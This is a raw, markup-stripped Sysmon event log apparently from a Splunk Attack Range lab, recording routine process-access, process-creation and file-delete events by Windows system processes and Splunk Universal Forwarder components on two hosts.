08:05:27.741{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809979Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.725{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809978Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:27.725{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809977Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.725{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F7C7-60EB-D379-00000000D001}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809976Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.725{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F7C7-60EB-D379-00000000D001}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809975Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.726{0C1E0330-F7C7-60EB-D379-00000000D001}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809974Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.663{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF7961222503384415DA6E1F05D6B19A,SHA256=B8BB82F9C55EB4E6FD55C81C673E3AC86078EA53CD91A6B297C1C8FCCEC7D217,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001053691Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:27.111{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A417274B39DF4153A3BED39BCFAB126,SHA256=836BC4ED55BEE01BE73CD1BEAEED0B51708F50111AAF61ECE75E7ACDDAC5EECE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809973Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.194{0C1E0330-F7C7-60EB-D279-00000000D001}15161476C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809972Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.054{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F7C7-60EB-D279-00000000D001}1516C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000809971Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.054{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809970Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.054{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000809969Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.054{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809968Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.054{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809967Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:27.054{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809966Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.054{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809965Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:27.038{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809964Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.038{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809963Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:27.038{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809962Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.038{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F7C7-60EB-D279-00000000D001}1516C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809961Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.038{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F7C7-60EB-D279-00000000D001}1516C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809960Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:27.039{0C1E0330-F7C7-60EB-D279-00000000D001}1516C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810004Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:28.725{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF727691660704B97CCC3BBAC8B70CA8,SHA256=1F37EE5A7BC669C2C917C01A5D0C9E987427717AFD4C87702D8693B7150691CE,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001053692Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:28.127{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42FD1367867DAE744E165B28A9F199C5,SHA256=3F7976411FD1A21AACB942147BBD69724B51D56696C5A7121B3CDCA7576FE257,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810003Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:28.522{0C1E0330-F7C8-60EB-D479-00000000D001}22963408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810002Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:28.382{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F7C8-60EB-D479-00000000D001}2296C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810001Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:28.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810000Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:28.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809999Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:05:28.366{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809998Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 